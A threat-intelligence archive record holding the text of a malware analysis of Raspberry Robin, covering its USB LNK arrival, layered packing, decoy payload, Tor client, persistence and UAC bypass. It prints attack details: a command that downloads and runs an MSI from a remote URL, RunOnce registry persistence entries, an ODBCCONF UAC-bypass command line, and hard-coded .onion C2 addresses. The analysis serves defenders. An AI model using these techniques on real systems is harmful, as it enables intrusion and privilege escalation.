{
	"id": "3fdff5c7-f3d1-43ec-a4a2-814f476ba343",
	"created_at": "2026-04-06T00:10:54.806248Z",
	"updated_at": "2026-04-10T03:21:47.045854Z",
	"deleted_at": null,
	"sha1_hash": "e39b2d0c2d496d922a6a22afc3cbc6c4329ed428",
	"title": "Raspberry Robin Malware Targets Telecom, Governments",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1476328,
	"plain_text": "Raspberry Robin Malware Targets Telecom, Governments\r\nBy Christopher So ( words)\r\nPublished: 2022-12-20 · Archived: 2026-04-05 22:36:36 UTC\r\nWe found a malware sample allegedly capable of connecting to the Tor network to deliver its payloads. Our initial analysis\r\nof the malware, which compromised a number of organizations toward the end of September, showed that while the main\r\nmalware routine contains both the real and fake payloads, it loads the fake payload once it detects sandboxing tools to evade\r\nsecurity and analytics tools from detecting and studying the malware's real routine. Meanwhile, the real payload remains\r\nobfuscated under packing layers and subsequently connects to the Tor network. The campaign and malware, identified as\r\nRaspberry Robin by Red Canary (detected by Trend Micro as Backdoor.Win32.RASPBERRYROBIN.A), seemingly spreads\r\nto systems with worm-like capabilities (due to the use of .lnk files) via an infected USB.\r\nGiven the malware’s layering features and the stages of its infection routine, we are still confirming its main motivation for\r\ndeployment. Currently, its possible motivation ranges from theft to cyberespionage. So far, we have noted the malware’s\r\ncapability to hide itself via multiple layers for obfuscation, as well as its feature of delivering a fake payload once the routine\r\ndetects sandboxing and analysis solutions. The group behind Raspberry Robin appears to be testing the waters to see how far\r\nits deployments can spread. Majority of the group’s victims are either government agencies or telecommunication entities\r\nfrom Latin America, Oceania (Australia), and Europe. Given the varying samples we have acquired since detecting these\r\ndeployments, we are continuing to monitor the developments for this malware as they occur.\r\nFigure 1. Percentage of Raspberry Robin detections worldwide from October to November\r\nArrival routine\r\nhttps://www.trendmicro.com/en_us/research/22/l/raspberry-robin-malware-targets-telecom-governments.html\r\nPage 1 of 10\n\nFigure 2. Raspberry Robin infection routine\r\nOnce the user connects the infected USB to the system, Raspberry Robin initially arrives as a shortcut or LNK file. The\r\nLNK file contains a command line that runs a legitimate executable to download a Windows Installer (MSI) package. This\r\nlegitimate executable is usually msiexec.exe, but we have also seen wmic.exe used in other samples.\r\nFigure 3. File containing a command line to run an executable\r\nWith obfuscation removed, the LNK file contains a target similar to the format \"cmd.exe /c start msiexec {URL}\". When the\r\nLNK file is double-clicked, the Windows Shell \"opens\" the shortcut file. In this case, \"open\" would mean \"execute\" since\r\nhttps://www.trendmicro.com/en_us/research/22/l/raspberry-robin-malware-targets-telecom-governments.html\r\nPage 2 of 10\n\nthe first item in the target is an executable file (cmd.exe). Cmd.exe then interprets anything after the switch /c as a command\r\nand executes it as if it was typed directly in a Command Prompt window. After executing the command, it exits. In this case,\r\nthe command is \"start msiexec {URL}\".\r\nWhen opened, it causes the target executable (cmd.exe) to execute with its parameters; the target executable is the URL\r\nwhere the MSI file is hosting the main malware. The \"start\" command is commonly used to execute another program\r\nwithout waiting for it to exit. If it did not use \"start\", cmd.exe will have to wait for msiexec to terminate before terminating\r\nitself. The malware is downloaded, treats the downloaded data as an MSI (Windows Installer) file and, if successful, is\r\nloaded by the legitimate executable file. The downloaded link has the following format:\r\nhttp[:]//{domain}:8080/{random strings and /}/\u003ccomputer name\u003e\r\nhttp[:]//{domain}:8080/{random strings and /}/\u003ccomputer name\u003e=\u003cuser name\u003e\r\nhttp[:]//{domain}:8080/{random strings and /}/\u003ccomputer name\u003e?\u003cuser name\u003e\r\nThe slashes in the LNK are a combination of forward slashes (/) and backslashes (\\). The domain is typically composed of\r\ntwo to four alphanumeric characters, followed by a dot and two additional characters.\r\nMain malware\r\nTo prevent researchers from analyzing this malware, Raspberry Robin’s main malware itself is packed multiple times, with\r\neach layer heavily obfuscated.\r\nCode obfuscation\r\nThe code is obfuscated in different ways. Starting from the third layer, each subroutine can be thought of as a state machine\r\nand implemented as a loop. At the start of each subroutine, the table of values is decrypted. This table of values serves as a\r\ncontainer for constant values used in the subroutine, as well as the state transition table.\r\nFigure 4. Each subroutine implemented as a loop\r\nhttps://www.trendmicro.com/en_us/research/22/l/raspberry-robin-malware-targets-telecom-governments.html\r\nPage 3 of 10\n\nAnother obfuscation technique used to hide the main malware obfuscates the call to other subroutines. In regular programs,\r\nthe address of another subroutine is in the call itself. In this malware, however, the address is computed using hard-coded\r\nvalues and values from the previously mentioned decrypted table of values. The result of this is placed in a register, and an\r\nindirect call is made using the register.\r\nFigure 5. Computing for the address using hard-coded values and table of values\r\nPacker characteristics\r\nThis malware is composed of two payloads embedded in a payload loader packed six times.\r\nFigure 6. A visual representation of the Raspberry Robin’s packing\r\nThe first and second layers belong to a single packer. The code at the entry point of the first layer only has four instructions:\r\n1. A sequence of a call to unpack the embedded loader\r\n2. A sequence to unpack the payload\r\n3. A jump to the loader, setting the return value to 1\r\n4. The return instruction\r\nIn reality, however, this layer is typically obfuscated as shown by this code snippet:\r\nhttps://www.trendmicro.com/en_us/research/22/l/raspberry-robin-malware-targets-telecom-governments.html\r\nPage 4 of 10\n\nFigure 7. First and second layer packing\r\nDumping the second layer, we saw that the third layer is located just after the second layer code, at offset 0x3F0:\r\nhttps://www.trendmicro.com/en_us/research/22/l/raspberry-robin-malware-targets-telecom-governments.html\r\nPage 5 of 10\n\nFigure 8. Dumping the second layer and going to the third\r\nWe noted layers 3 and 5 as capable of anti-analysis techniques. Meanwhile, we found that not all layers have unique packers.\r\nThe fourth and seventh layers are identical, as well as the tenth and thirteenth. The packing of the eighth and fourteenth\r\nlayers are also similar. This repeated use of packers implies that the group is using a separate packing program. We are\r\ncontinuing with our analysis to see if this program is their own or if it is outsourced to other groups, as this technique can be\r\nindicative of the group’s future use of these same packers. It is also possible for these same packers to be replaced with\r\nvariations in patterns.\r\nOn layer 8, the payload loader, the execution splits into two paths. If the malware detects that it is being analyzed, it loads\r\nthe fake payload. Otherwise, it loads the real payload.\r\nFake payload\r\nThe fake payload has two layers, the first of which is a shellcode with an embedded PE file, while the second layer is a PE\r\nfile with the MZ header and PE signature removed. The second layer is loaded by the first layer and jumps into it.\r\nUpon execution, the second layer immediately creates a thread to where its main routine is located. It first attempts to read\r\nthe registry value named “Active” at \u003cHKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Media\u003e. This serves as an infection\r\nmarker. If the read fails, it proceeds to write the string value “1” into this registry value, then gathers system information: the\r\ncomputer name, current username, processor brand, and display device names. In some versions of the fake payload, the\r\ndata is encrypted using RC4 with a hard-coded key. The system information is then appended to the URL http[:]//{IP\r\nhttps://www.trendmicro.com/en_us/research/22/l/raspberry-robin-malware-targets-telecom-governments.html\r\nPage 6 of 10\n\naddress}:8080/. The full URL is then accessed, and a file is downloaded. In some versions of the malware, this downloaded\r\nfile is also executed.\r\nAnalyzing other sample versions of the fake payload, we found that if the main routine is successful, it checks if the system\r\nis linked to a domain by checking the existence of the environment variable USERDNSDOMAIN. If this variable does not\r\nexist, it drops and executes an adware named BrowserAssistant to %User Temp%\\{random number}.exe, likely to make an\r\nanalyst feel complacent about allegedly already finding the payload and therefore no longer needing to conduct further\r\nstudies of the samples.\r\nReal payload\r\nThe real payload is made up of three layers, with the third layer containing the actual payload binary packed twice. Within\r\nthe real payload is an embedded custom Tor client designed to communicate with the real payload using shared memory.\r\nInstallation\r\nIts method for checking whether the malware has been installed on the system involves checking if it is running in Session\r\n0. Prior to Windows Vista, services were run in the session of the first user to log in to the system, which is called Session 0.\r\nHowever, from Windows Vista onward, Microsoft introduced a security enhancement called “Session 0 Isolation,” where\r\nSession 0 is now reserved for services and other non-interactive user applications.\r\nWith this security enhancement, the threat actor confirms whether the user profile is running on administrative privileges or\r\nnot. If it is not in Session 0, it drops a copy of itself in \u003c%ProgramData%\\{random folder name}\\{random file name}.\r\n{extension}\u003e to elevate privileges, or \u003c%ProgramData%\\Microsoft\\{random folder name}\\{random file name}.{extension}\u003e\r\nif the user is running as an admin. In this manner, a security analyst would view the malicious routine as having been started\r\nand run by a legitimate Windows process, allowing the routine to evade detection.The extension name is randomly chosen\r\namong the following:\r\n.bak\r\n.dat\r\n.db\r\n.dmp\r\n.etl\r\n.idx\r\n.json\r\n.lkg\r\n.lock\r\nlog\r\n.man\r\n.tmp\r\ntxt\r\n.vdm\r\n.xml\r\n.xsd\r\nIt also sets the following registry entry to enable its automatic execution at system startup. If the user is not at an admin\r\nlevel, the malware modifies the registry with \r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\r\n{random value name} = “rundll32 shell32 ShellExec_RunDLLA REGSVR /u /s “{dropped copy path and file name}.””\r\nInversely, if the user’s profile is with admin privileges, the registry is modified with\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\{random key name}\r\n{random value name} = “shell32|ShellExec_RunDLLA|REGSVR /u /s “{dropped copy path and file name}.””\r\nhttps://www.trendmicro.com/en_us/research/22/l/raspberry-robin-malware-targets-telecom-governments.html\r\nPage 7 of 10\n\nPrivilege escalation\r\nAfter dropping a copy of itself, it executes the dropped copy as Administrator using a UAC (User Account Control) bypass\r\ntechnique. It implements a variation of the technique ucmDccwCOMMethod in UACMe, thereby abusing the built-in\r\nWindows AutoElevate backdoor.\r\nIt first checks whether atcuf32.dll, aswhook.dll, and avp.exe are loaded in the system. These files are from security defenders\r\nBitDefender, Avast, and Kaspersky, respectively. If one of these is loaded, it does not proceed to the UAC bypass routine. It\r\nthen drops a shortcut file to \u003c%User Temp%\\{random file name}.lnk\u003e that contains the command line\r\nrundll32.exe SHELL32,ShellExec_RunDLL \"C:\\Windows\\system32\\ODBCCONF.EXE\" /a {configsysdsn\r\nOCNKBENXGMI etba odjcnr} /A {installtranslator fxodi} -a {installdriver qmprmxf} /a {configsdn HHAP} regsvr \"\r\n{dropped copy path and file name}.\" /S /e -s\r\nIt then creates an elevated COM object for CMLuaUtil and uses it to set a custom display calibrator in the registry that\r\npoints to the dropped LNK file. It sets the custom display calibrator by setting the registry value\r\nHKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\ICM\\Calibration\r\nDisplayCalibrator = \"%User Temp%\\{random file name}.lnk\"\r\nIt then creates an elevated COM object for ColorDataProxy and calls its method “LaunchDccw” to load the calibrator, thus\r\nexecuting the malicious LNK. Afterward, it sets the registry value DisplayCalibrator to\r\n“%SystemRoot%\\System32\\DCCW.exe” to hide its activity.\r\nMain routine\r\nRunning in Session 0, the real payload attempts to connect to the hard-coded Tor addresses, where the connections are made\r\nin another process. For the real payload to facilitate the exchange of information and the Tor-connecting process, a shared-named memory map is created with the following format:\r\nTable 1. Shared memory map format\r\nOffset Size Description\r\n00h 1 Flag\r\n01h 1 Success\r\n04h 4 (DWORD) IP address\r\n08h 8 (FILETIME)  \r\n10h 4 (DWORD) Data size\r\n14h Data size Data\r\nThe Tor address is written to offset 14h of the shared memory, hard-coded but encrypted within the sample itself. The\r\nfollowing are some of the .onion (V2) addresses we identified:\r\nsejnfjrq6szgca7v\r\nzdfsyv3rubuhpql3\r\nihdhoeoovbtgutfm\r\ntapeucwutvne7l5o\r\n2qlvvvnhqyda2ahd\r\nanswerstedhctbek\r\n5j7saze5byfqccf3\r\ncmgvqnxjoiqthvrc\r\n3bbaaaccczcbdddz\r\nhttps://www.trendmicro.com/en_us/research/22/l/raspberry-robin-malware-targets-telecom-governments.html\r\nPage 8 of 10\n\nsgvtcaew4bxjd7ln\r\nugw3zjsayleoamaz\r\nynvs3km32u33agwq\r\nnjalladnspotetti\r\npsychonaut3z5aoz\r\nhabaivdfcyamjhkk\r\ntorwikignoueupfm\r\nbitmailendavkbec\r\ncyphdbyhiddenbhs\r\nclgs64523yi2bkhz\r\n76qugh5bey5gum7l\r\nhd37oiauf5uoz7gg\r\nexpressobutiolem\r\ngl3n4wtekbfaubye\r\narchivecaslytosk\r\nkyk55bof3hzdiwrm\r\nqqvyib4j3fz66nuc\r\nbcwpy5wca456u7tz\r\npornhubthbh7ap3u\r\nfncuwbiisyh6ak3i\r\nIn starting its Tor client process, the real payload randomly selects a name among these first:\r\ndllhost.exe\r\nregsvr32.exe\r\nrundll32.exe\r\nIt then creates a suspended process, injects the code of the Tor client, resumes the process, and waits for data from the Tor\r\nclient. As far as what the sample does to the received data, we have not seen any use of it in the wild so far since we did find\r\nthat the buffer containing the data is freed without using it.\r\nTor client\r\nThe Tor client itself is composed of four layers. The first two layers are packer codes. The third layer retrieves the Tor\r\naddress from the shared memory, unpacks the fourth layer, and calls the fourth layer to do the actual Tor communication.\r\nThe data received by the fourth layer is encrypted by the third layer and written to the shared memory, to be read by the\r\nmain routine.\r\nConclusion\r\nNoticeably, the malware uses many anti-analysis techniques, while its main payload is packed with many layers that require\r\nanalysis. Therefore, an analyst who lacks experience will find only the fake payload. Clearly, the actor behind this has made\r\nconsiderable effort to hinder analysis.\r\nWhile the technique of packing the codes is not unique, some of the packing layers have very similar codes and can be\r\ngrouped into packer families. The style of packing is also similar on all layers except for the first two: An executable is\r\nstripped of some header information, encrypted, and added to the unpacking code. The group must therefore be using\r\nsomething akin to a packed sample generator, which takes a payload executable and produces a multi-layered packed\r\nsample. On the surface, it looks like the group could be providing this as \"packing service\" or \"executable packing-as-a-service\" (if there is such a term), and the people behind this could be associated with the threat actors behind LockBit. We\r\ncontinue to analyze and document all the anti-debugging techniques and layers used in these samples and incidents.\r\nThe use of Session 0 is also sophisticated. The purpose of Session 0 Isolation is to increase system security by preventing\r\nservices running in the local system account having user interactions. Isolating services in their own non-interactive sections\r\nhttps://www.trendmicro.com/en_us/research/22/l/raspberry-robin-malware-targets-telecom-governments.html\r\nPage 9 of 10\n\ninaccessible by regular processes will decrease the chances of abuse to elevate another piece of (malicious) code's privileges.\r\nHence, having access to Session 0 would mean privilege escalation. However, an attacker must use privilege escalation\r\ntechniques to gain access.\r\nFrom the samples we gathered, we found the abuse of the elevated COM interface. Making one of those elevated COM\r\nclasses execute the code implies that the malicious actor’s access is also automatically elevated, provided the threat actor\r\nfinds the specific COM class that can accept a program name (or something similar) and trigger it to run. In this case, it's\r\nImage Color Management. Display calibration is done by a program that is specified in a registry entry. By replacing or\r\nadding that entry and then triggering the system to perform display calibration, whatever is specified in that registry entry\r\nwill be executed.\r\nIt is also noteworthy that the ICM calibration technique was previously seen in the LockBit ransomware as far as privilege\r\nescalation is concerned. There is also the similarity of the anti-debugging technique using ThreadHideFromDebugger.\r\nHowever, even if Raspberry Robin uses the same techniques, we cannot conclude for certain that the actors behind LockBit\r\nand Raspberry Robin are the same. Still, since LockBit operates as a ransomware-as-a-service (RaaS) group, some of the\r\nfollowing could still be true:\r\nThe group behind LockBit is also behind Raspberry Robin.\r\nThe group behind Raspberry Robin is the maker of some of the tools LockBit is also using.\r\nThe group behind Raspberry Robin availed of the services of the affiliate responsible for the techniques used by\r\nLockBit.\r\nGiven that the returned data is empty and was not used, it seems that the actor has been trying to see how far its campaign\r\noperation can spread, most likely as part of its reconnaissance effort. We can thus consider this an indication of a possible\r\nroutine for the group’s long-term plans, as well as a possible precursor to a follow-up operation in the future.\r\nIndicator of Compromise (IOC)\r\nSHA256 Description Detection name\r\n6fb0ad3f756b5d1f871cf34c3e4ea47cb34643cd17709a09c25076c400313adf\r\nMain\r\nmalware\r\nexecutable\r\nBackdoor.Win32.RASPBERRYROBI\r\nTags\r\nSource: https://www.trendmicro.com/en_us/research/22/l/raspberry-robin-malware-targets-telecom-governments.html\r\nhttps://www.trendmicro.com/en_us/research/22/l/raspberry-robin-malware-targets-telecom-governments.html\r\nPage 10 of 10",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"ETDA"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/22/l/raspberry-robin-malware-targets-telecom-governments.html"
	],
	"report_names": [
		"raspberry-robin-malware-targets-telecom-governments.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434254,
	"ts_updated_at": 1775791307,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e39b2d0c2d496d922a6a22afc3cbc6c4329ed428.pdf",
		"text": "https://archive.orkl.eu/e39b2d0c2d496d922a6a22afc3cbc6c4329ed428.txt",
		"img": "https://archive.orkl.eu/e39b2d0c2d496d922a6a22afc3cbc6c4329ed428.jpg"
	}
}